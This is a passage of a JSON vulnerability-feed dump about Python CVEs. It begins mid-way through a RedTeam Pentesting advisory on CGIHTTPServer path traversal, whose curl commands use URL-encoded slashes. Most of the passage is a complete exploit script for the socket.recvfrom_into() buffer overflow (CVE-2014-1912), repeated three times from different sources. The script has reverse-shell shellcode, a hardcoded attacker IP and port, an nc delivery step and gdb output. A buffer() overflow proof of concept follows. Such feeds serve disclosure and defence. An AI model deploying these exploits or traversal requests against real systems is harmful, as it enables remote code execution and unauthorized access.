\"/cgi-bin/subdir\" as part of the request handler's \ncgi_directories, a CGI script named test.py in that directory is not \nexecuted: \n \n$ curl http://localhost:8000/cgi-bin/subdir/test.py \n[...] \n<p>Error code 403. \n<p>Message: CGI script is not a plain file ('/cgi-bin/subdir'). \n[...] \n \nHere, is_cgi() set self.cgi_info to ('/cgi-bin', 'subdir/test.py') and \nreturned True. Next, run_cgi() further dissected these paths to perform \nsome sanity checks, thereby mistakenly assuming subdir to be the \nexecutable script's filename and test.py to be path info. As subdir is \nnot an executable file, run_cgi() returns an error message. However, if \nthe forward slash between subdir and test.py is replaced with %2f, \ninvoking the script succeeds: \n \n$ curl http://localhost:8000/cgi-bin/subdir%2ftest.py \n{\"text\": \"This is a Test\"} \n \nThis is because neither is_cgi() nor run_cgi() URL decode the path \nduring processing until run_cgi() tries to determine whether the target \nscript is an executable file. More specifically, as subdir%2ftest.py \ndoes not contain a forward slash, it is not split into the script name \nsubdir and path info test.py, as in the previous example. \n \nSimilarly, using URL encoded forward slashes, executables outside of a \nCGI directory can be executed: \n \n$ curl http://localhost:8000/cgi-bin/..%2ftraversed.py \n{\"text\": \"This is a Test\"} \n \n \nWorkaround \n========== \n \nSubclass CGIHTTPRequestHandler and override the is_cgi() method with a \nvariant that first URL decodes the supplied path, for example: \n \nclass FixedCGIHTTPRequestHandler(CGIHTTPServer.CGIHTTPRequestHandler): \ndef is_cgi(self): \nself.path = urllib.unquote(self.path) \nreturn CGIHTTPServer.CGIHTTPRequestHandler.is_cgi(self) \n \n \nFix \n=== \n \nUpdate to the latest Python version from the Mercurial repository at \nhttp://hg.python.org/cpython/ \n \n \nSecurity Risk \n============= \n \nThe vulnerability can be used to gain access to the contents of CGI \nbinaries or the source code of CGI scripts. This may reveal sensitve \ninformation, for example access credentials. This can greatly help \nattackers in mounting further attacks and is therefore considered to \npose a high risk. Furthermore attackers may be able to execute code that \nwas not intended to be executed. However, this is limited to files \nstored in the server's working directory or in its subdirectories. \n \nThe CGIHTTPServer code does contain this warning: \n\"SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL\" \nEven when used on a local computer this may allow other local users to \nexecute code in the context of another user. \n \n \nTimeline \n======== \n \n2014-04-07 Vulnerability identified \n2014-06-11 Customer approved disclosure to vendor \n2014-06-11 Vendor notified \n2014-06-15 Vendor disclosed vulnerability in their public bug tracker \nand addressed it in public source code repository \n2014-06-23 CVE number requested \n2014-06-25 CVE number assigned \n2014-06-26 Advisory released \n \n \nReferences \n========== \n \nhttp://bugs.python.org/issue21766 \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests, short pentests, \nperformed by a team of specialised IT-security experts. Hereby, security \nweaknesses in company networks or products are uncovered and can be \nfixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity related areas. The results are made available as public \nsecurity advisories. \n \nMore information about RedTeam Pentesting can be found at \nhttps://www.redteam-pentesting.de. \n \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/127241/rt-sa-2014-008.txt"}], "freebsd": [{"lastseen": "2019-05-29T18:33:30", "bulletinFamily": "unix", "cvelist": ["CVE-2014-1912"], "description": "\nVincent Danen via Red Hat Issue Tracker reports:\n\nA vulnerability was reported in Python's socket module, due to a\n\t boundary error within the sock_recvfrom_into() function, which could be\n\t exploited to cause a buffer overflow. This could be used to crash a\n\t Python application that uses the socket.recvfrom_info() function or,\n\t possibly, execute arbitrary code with the permissions of the user\n\t running vulnerable Python code.\nThis vulnerable function, socket.recvfrom_into(), was introduced in\n\t Python 2.5. Earlier versions are not affected by this flaw.\n\n", "edition": 4, "modified": "2014-01-14T00:00:00", "published": "2014-01-14T00:00:00", "id": "8E5E6D42-A0FA-11E3-B09A-080027F2D077", "href": "https://vuxml.freebsd.org/freebsd/8e5e6d42-a0fa-11e3-b09a-080027f2d077.html", "title": "Python -- buffer overflow in socket.recvfrom_into()", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-01-06T11:03:52", "description": "Proof of concept, that demonstrated the remote exploitability of this python socket flaw, if the python code uses recvfrom_into unsafelly.\r To avoid NX, ret2libc can be used thanx to", "edition": 2, "published": "2014-02-23T00:00:00", "type": "zdt", "title": "Python socket.recvfrom_into() remote buffer overflow exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1912"], "modified": "2014-02-23T00:00:00", "id": "1337DAY-ID-21938", "href": "https://0day.today/exploit/description/21938", "sourceData": "#!/usr/bin/env python\r\n\r\n'''\r\n# Exploit Title: python socket.recvfrom_into() remote buffer overflow\r\n# Date: 21/02/2014\r\n# Exploit Author: @sha0coder\r\n# Vendor Homepage: python.org\r\n# Version: python2.7 and python3\r\n# Tested on: linux 32bit + python2.7\r\n# CVE : CVE-2014-1912\r\n\r\n\r\n\r\nsocket.recvfrom_into() remote buffer overflow Proof of concept\r\nby @sha0coder\r\n\r\nTODO: rop to evade stack nx \r\n\r\n\r\n(gdb) x/i $eip\r\n=> 0x817bb28:\tmov eax,DWORD PTR [ebx+0x4] <--- ebx full control => eax full conrol\r\n 0x817bb2b:\ttest BYTE PTR [eax+0x55],0x40\r\n 0x817bb2f:\tjne 0x817bb38 -->\r\n ...\r\n 0x817bb38:\tmov eax,DWORD PTR [eax+0xa4] <--- eax full control again\r\n 0x817bb3e:\ttest eax,eax\r\n 0x817bb40:\tjne 0x817bb58 -->\r\n ...\r\n 0x817bb58:\tmov DWORD PTR [esp],ebx\r\n 0x817bb5b:\tcall eax <--------------------- indirect fucktion call ;)\r\n\r\n\r\n$ ./pyrecvfrominto.py \r\n\tegg file generated\r\n\r\n$ cat egg | nc -l 8080 -vv\r\n\r\n... when client connects ... or wen we send the evil buffer to the server ...\r\n\r\n0x0838591c in ?? ()\r\n1: x/5i $eip\r\n=> 0x838591c:\tint3 \t\t\t<--------- LANDED!!!!!\r\n 0x838591d:\txor eax,eax\r\n 0x838591f:\txor ebx,ebx\r\n 0x8385921:\txor ecx,ecx\r\n 0x8385923:\txor edx,edx\r\n\r\n'''\r\n\r\nimport struct\r\n\r\ndef off(o):\r\n\treturn struct.pack('L',o)\r\n\r\n\r\nreverseIP = '\\xc0\\xa8\\x04\\x34' #'\\xc0\\xa8\\x01\\x0a'\r\nreversePort = '\\x7a\\x69'\r\n\r\n\r\n#shellcode from exploit-db.com, (remove the sigtrap)\r\nshellcode = \"\\xcc\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\"\\\r\n\t\t\t\"\\xb0\\x66\\xb3\\x01\\x51\\x6a\\x06\\x6a\"\\\r\n\t\t\t\"\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x89\"\\\r\n\t\t\t\"\\xc6\\xb0\\x66\\x31\\xdb\\xb3\\x02\\x68\"+\\\r\n\t\t\treverseIP+\"\\x66\\x68\"+reversePort+\"\\x66\\x53\\xfe\"\\\r\n\t\t\t\"\\xc3\\x89\\xe1\\x6a\\x10\\x51\\x56\\x89\"\\\r\n\t\t\t\"\\xe1\\xcd\\x80\\x31\\xc9\\xb1\\x03\\xfe\"\\\r\n\t\t\t\"\\xc9\\xb0\\x3f\\xcd\\x80\\x75\\xf8\\x31\"\\\r\n\t\t\t\"\\xc0\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\"\\\r\n\t\t\t\"\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\"\\\r\n\t\t\t\"\\x89\\xe1\\x52\\x89\\xe2\\xb0\\x0b\\xcd\"\\\r\n\t\t\t\"\\x80\"\r\n\r\n\r\nshellcode_sz = len(shellcode)\r\n\r\nprint 'shellcode sz %d' % shellcode_sz\r\n\r\n\r\nebx = 0x08385908\r\nsc_off = 0x08385908+20\r\n\r\npadd = 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM'\r\n\r\n''' \r\n +------------+----------------------+ +--------------------+\r\n | | | | |\r\n V | | V |\r\n'''\r\nbuff = 'aaaa' + off(ebx) + 'aaaaaAAA'+ off(ebx) + shellcode + padd + off(sc_off) # .. and landed ;)\r\n\r\n\r\nprint 'buff sz: %s' % len(buff)\r\nopen('egg','w').write(buff)\n\n# 0day.today [2018-01-06] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21938"}], "seebug": [{"lastseen": "2017-11-19T17:31:51", "description": "CVE(CAN) ID: CVE-2014-1912\r\n\r\nPython\u662f\u4e00\u79cd\u9762\u5411\u5bf9\u8c61\u3001\u76f4\u8bd1\u5f0f\u8ba1\u7b97\u673a\u7a0b\u5e8f\u8bbe\u8ba1\u8bed\u8a00\u3002\r\n\r\nPython 2.7\u7248\u672c\u7684&quot;sock_recvfrom_into()&quot;\u51fd\u6570(Modules/socketmodule.c)\u5b58\u5728\u8fb9\u754c\u9519\u8bef\uff0c\u5229\u7528\u540e\u53ef\u9020\u6210\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n0\nPython python 2.7.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nPython\r\n------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://bugs.python.org/issue20246", "published": "2014-02-25T00:00:00", "title": "Python &quot;sock_recvfrom_into()&quot; \u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1912"], "modified": "2014-02-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61560", "id": "SSV:61560", "sourceData": "\n #!/usr/bin/env python\r\n \r\n'''\r\n# Exploit Title: python socket.recvfrom_into() remote buffer overflow\r\n# Date: 21/02/2014\r\n# Exploit Author: @sha0coder\r\n# Vendor Homepage: python.org\r\n# Version: python2.7 and python3\r\n# Tested on: linux 32bit + python2.7\r\n# CVE : CVE-2014-1912\r\n \r\n \r\n \r\nsocket.recvfrom_into() remote buffer overflow Proof of concept\r\nby @sha0coder\r\n \r\nTODO: rop to evade stack nx \r\n \r\n \r\n(gdb) x/i $eip\r\n=&gt; 0x817bb28: mov eax,DWORD PTR [ebx+0x4] &lt;--- ebx full control =&gt; eax full conrol\r\n 0x817bb2b: test BYTE PTR [eax+0x55],0x40\r\n 0x817bb2f: jne 0x817bb38 --&gt;\r\n ...\r\n 0x817bb38: mov eax,DWORD PTR [eax+0xa4] &lt;--- eax full control again\r\n 0x817bb3e: test eax,eax\r\n 0x817bb40: jne 0x817bb58 --&gt;\r\n ...\r\n 0x817bb58: mov DWORD PTR [esp],ebx\r\n 0x817bb5b: call eax &lt;--------------------- indirect fucktion call ;)\r\n \r\n \r\n$ ./pyrecvfrominto.py \r\n egg file generated\r\n \r\n$ cat egg | nc -l 8080 -vv\r\n \r\n... when client connects ... or wen we send the evil buffer to the server ...\r\n \r\n0x0838591c in ?? ()\r\n1: x/5i $eip\r\n=&gt; 0x838591c: int3 &lt;--------- LANDED!!!!!\r\n 0x838591d: xor eax,eax\r\n 0x838591f: xor ebx,ebx\r\n 0x8385921: xor ecx,ecx\r\n 0x8385923: xor edx,edx\r\n \r\n'''\r\n \r\nimport struct\r\n \r\ndef off(o):\r\n return struct.pack('L',o)\r\n \r\n \r\nreverseIP = '\\xc0\\xa8\\x04\\x34' #'\\xc0\\xa8\\x01\\x0a'\r\nreversePort = '\\x7a\\x69'\r\n \r\n \r\n#shellcode from exploit-db.com, (remove the sigtrap)\r\nshellcode = &quot;\\xcc\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2&quot;\\\r\n &quot;\\xb0\\x66\\xb3\\x01\\x51\\x6a\\x06\\x6a&quot;\\\r\n &quot;\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x89&quot;\\\r\n &quot;\\xc6\\xb0\\x66\\x31\\xdb\\xb3\\x02\\x68&quot;+\\\r\n reverseIP+&quot;\\x66\\x68&quot;+reversePort+&quot;\\x66\\x53\\xfe&quot;\\\r\n &quot;\\xc3\\x89\\xe1\\x6a\\x10\\x51\\x56\\x89&quot;\\\r\n &quot;\\xe1\\xcd\\x80\\x31\\xc9\\xb1\\x03\\xfe&quot;\\\r\n &quot;\\xc9\\xb0\\x3f\\xcd\\x80\\x75\\xf8\\x31&quot;\\\r\n &quot;\\xc0\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68&quot;\\\r\n &quot;\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53&quot;\\\r\n &quot;\\x89\\xe1\\x52\\x89\\xe2\\xb0\\x0b\\xcd&quot;\\\r\n &quot;\\x80&quot;\r\n \r\n \r\nshellcode_sz = len(shellcode)\r\n \r\nprint 'shellcode sz %d' % shellcode_sz\r\n \r\n \r\nebx = 0x08385908\r\nsc_off = 0x08385908+20\r\n \r\npadd = 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM'\r\n \r\n''' \r\n +------------+----------------------+ +--------------------+\r\n | | | | |\r\n V | | V |\r\n'''\r\nbuff = 'aaaa' + off(ebx) + 'aaaaaAAA'+ off(ebx) + shellcode + padd + off(sc_off) # .. and landed ;)\r\n \r\n \r\nprint 'buff sz: %s' % len(buff)\r\nopen('egg','w').write(buff)\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-61560"}, {"lastseen": "2017-11-19T16:33:57", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Python socket.recvfrom_into() - Remote Buffer Overflow", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1912"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-85189", "id": "SSV:85189", "sourceData": "\n #!/usr/bin/env python\r\n\r\n&#39;&#39;&#39;\r\n# Exploit Title: python socket.recvfrom_into() remote buffer overflow\r\n# Date: 21/02/2014\r\n# Exploit Author: @sha0coder\r\n# Vendor Homepage: python.org\r\n# Version: python2.7 and python3\r\n# Tested on: linux 32bit + python2.7\r\n# CVE : CVE-2014-1912\r\n\r\n\r\n\r\nsocket.recvfrom_into() remote buffer overflow Proof of concept\r\nby @sha0coder\r\n\r\nTODO: rop to evade stack nx \r\n\r\n\r\n(gdb) x/i $eip\r\n=&#62; 0x817bb28:\tmov eax,DWORD PTR [ebx+0x4] &#60;--- ebx full control =&#62; eax full conrol\r\n 0x817bb2b:\ttest BYTE PTR [eax+0x55],0x40\r\n 0x817bb2f:\tjne 0x817bb38 --&#62;\r\n ...\r\n 0x817bb38:\tmov eax,DWORD PTR [eax+0xa4] &#60;--- eax full control again\r\n 0x817bb3e:\ttest eax,eax\r\n 0x817bb40:\tjne 0x817bb58 --&#62;\r\n ...\r\n 0x817bb58:\tmov DWORD PTR [esp],ebx\r\n 0x817bb5b:\tcall eax &#60;--------------------- indirect fucktion call ;)\r\n\r\n\r\n$ ./pyrecvfrominto.py \r\n\tegg file generated\r\n\r\n$ cat egg | nc -l 8080 -vv\r\n\r\n... when client connects ... or wen we send the evil buffer to the server ...\r\n\r\n0x0838591c in ?? ()\r\n1: x/5i $eip\r\n=&#62; 0x838591c:\tint3 \t\t\t&#60;--------- LANDED!!!!!\r\n 0x838591d:\txor eax,eax\r\n 0x838591f:\txor ebx,ebx\r\n 0x8385921:\txor ecx,ecx\r\n 0x8385923:\txor edx,edx\r\n\r\n&#39;&#39;&#39;\r\n\r\nimport struct\r\n\r\ndef off(o):\r\n\treturn struct.pack(&#39;L&#39;,o)\r\n\r\n\r\nreverseIP = &#39;\\xc0\\xa8\\x04\\x34&#39; #&#39;\\xc0\\xa8\\x01\\x0a&#39;\r\nreversePort = &#39;\\x7a\\x69&#39;\r\n\r\n\r\n#shellcode from exploit-db.com, (remove the sigtrap)\r\nshellcode = &#34;\\xcc\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2&#34;\\\r\n\t\t\t&#34;\\xb0\\x66\\xb3\\x01\\x51\\x6a\\x06\\x6a&#34;\\\r\n\t\t\t&#34;\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x89&#34;\\\r\n\t\t\t&#34;\\xc6\\xb0\\x66\\x31\\xdb\\xb3\\x02\\x68&#34;+\\\r\n\t\t\treverseIP+&#34;\\x66\\x68&#34;+reversePort+&#34;\\x66\\x53\\xfe&#34;\\\r\n\t\t\t&#34;\\xc3\\x89\\xe1\\x6a\\x10\\x51\\x56\\x89&#34;\\\r\n\t\t\t&#34;\\xe1\\xcd\\x80\\x31\\xc9\\xb1\\x03\\xfe&#34;\\\r\n\t\t\t&#34;\\xc9\\xb0\\x3f\\xcd\\x80\\x75\\xf8\\x31&#34;\\\r\n\t\t\t&#34;\\xc0\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68&#34;\\\r\n\t\t\t&#34;\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53&#34;\\\r\n\t\t\t&#34;\\x89\\xe1\\x52\\x89\\xe2\\xb0\\x0b\\xcd&#34;\\\r\n\t\t\t&#34;\\x80&#34;\r\n\r\n\r\nshellcode_sz = len(shellcode)\r\n\r\nprint &#39;shellcode sz %d&#39; % shellcode_sz\r\n\r\n\r\nebx = 0x08385908\r\nsc_off = 0x08385908+20\r\n\r\npadd = &#39;AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM&#39;\r\n\r\n&#39;&#39;&#39; \r\n +------------+----------------------+ +--------------------+\r\n | | | | |\r\n V | | V |\r\n&#39;&#39;&#39;\r\nbuff = &#39;aaaa&#39; + off(ebx) + &#39;aaaaaAAA&#39;+ off(ebx) + shellcode + padd + off(sc_off) # .. and landed ;)\r\n\r\n\r\nprint &#39;buff sz: %s&#39; % len(buff)\r\nopen(&#39;egg&#39;,&#39;w&#39;).write(buff)\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-85189"}], "archlinux": [{"lastseen": "2016-09-02T18:44:47", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7185"], "description": "It was reported that Python 2.7.8 fixes a potential wraparound in\nbuffer() with possible CWE-200 implications. This could allow an\nattacker to access private information through information leakage.\n\nPoC:\n\n--- overflow.py ---\nimport sys\na = bytearray('here be dragons')\nb = buffer(a, sys.maxsize, sys.maxsize)\nprint b[:8192]\n-------------------", "modified": "2014-09-26T00:00:00", "published": "2014-09-26T00:00:00", "id": "ASA-201409-3", "href": "https://lists.archlinux.org/pipermail/arch-security/2014-September/000102.html", "type": "archlinux", "title": "python2: Information leakage through integer overflow", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}]}